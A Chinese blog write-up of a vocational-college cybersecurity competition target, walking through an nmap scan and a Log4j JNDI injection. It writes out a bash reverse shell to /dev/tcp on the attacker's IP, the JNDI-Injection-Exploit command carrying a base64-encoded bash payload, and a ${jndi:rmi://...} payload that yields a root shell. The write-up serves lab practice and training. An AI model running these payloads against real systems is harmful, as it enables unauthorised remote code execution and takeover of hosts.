前言:由于本人刚刚参加了XXX省职业院校技能大赛,用的设备是神州数码(DCN)的网络安全设备,神州数码是真的太狗了,我们答案正确,但是无法提交,和裁判说了裁判说是我们个人的问题,但是并不影响我发挥,言归正传:C模块有10个靶机,其中8个是远程代码执行,还有二个是文件包含还有SQL注入,都挺简单,下面开始复现

1.1端口查看

我们拿到了IP地址,先使用nmap进行扫描
在这里插入图片描述
注意:这里会有些许的偏差,比赛开的端口是:22 ,445 ,8080 445中smb共享啥都没有,可以忽略掉,我们这里直接访问网页

在这里插入图片描述

1.2:这里给了这么一个网页,里面啥都没有,只有三个问号,你点击进去后网页只有一个Ok的内容,但是URL会发生变化

在这里插入图片描述

一开始我以为是个文件包含,然后我试了以下,发现并不是,啥信息都没给
在这里插入图片描述

1.4:到这里的时候我犹豫了20多分钟,我一直在想,这是个啥玩意,直到我返回kali 看到了裁判提供了一个漏洞包,这让我焕然大悟,于是学这开始利用
在这里插入图片描述

就是这么个东西,我没记错可能是在/root目录下还是在桌面上那个/tools2文件夹里面

大概的利用思路就是先加密一个反弹shell的base64编码,然后开一个监听:
bash -i >& /dev/tcp/本机IP/7777 0>&1

在这里插入图片描述

然后开始使用那个包,利用方式:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "想要执行的命令" -A "攻击机的ip"

我们加密完成后把编码加上去:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
 -C "bash -c {echo, 反弹shell后base64的内容}|{base64,-d}|{bash,-i}"
-A 192.168.111.174

在这里插入图片描述

开始执行,我们拿到了Payload,下面我们开一个监听
在这里插入图片描述
下面我们构建一个语句,进行网页替换:

${jndi:rmi://192.168.111.174:1099/5zxeqz}

我们把语句放到burp里面进行URL编码转换
在这里插入图片描述
在这里插入图片描述

点击发包之后kali端就会接收到一个shell,是URL编码是反弹成功的,默认就是root用户

在这里插入图片描述

1.5: 我们再次查看jar包发现也有执行成功的返回值
在这里插入图片描述

续写:如果想要拿到flag,那还要进行密码修改,然后使用ssh连接

在这里插入图片描述
在这里插入图片描述

flag是自己做的,不是准确flag!!!
想要环境的可以私信一下博主,博主VX:vmxlog
Logo

技术共进,成长同行——讯飞AI开发者社区

更多推荐